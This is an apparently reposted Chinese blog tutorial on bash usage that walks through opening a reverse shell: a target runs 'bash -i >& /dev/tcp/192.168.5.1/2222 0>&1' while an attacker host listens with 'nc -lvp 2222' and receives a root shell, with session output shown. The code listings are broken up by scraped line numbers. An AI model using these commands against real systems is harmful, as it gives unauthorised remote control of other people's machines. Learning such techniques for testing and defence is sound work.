bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell!
基本使用语法
|
1
|
bash
-c 命令
|
|
1
2
3
|
root@kali:~
# bash -c whoami
root
root@kali:~
#
|
另外使用-i表示以交互方式运行shell,通常在目标主机上运行
|
1
|
bash
-i >&
/dev/tcp/192
.168.5.1
/2222
0>&1
|
然后另一台主机使用nc进行监听该端口,即可获取到一个shell!
目标主机:
|
1
|
root@kali:~
# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1
|
攻击主机:
|
1
2
3
4
5
6
7
8
9
10
11
|
F:\\eth10-CTF-Toolkits\\CTF工具包\\连接工具>nc -lvp 2222
lstn on [any] 2222 ..
192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATA
connect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATA
root@kali:~
# uname -a
uname
-a
Linux kali 4.6.0-kali1-amd64
#1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:~
# whoami
whoami
root
root@kali:~
#exit
|
本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/1960279
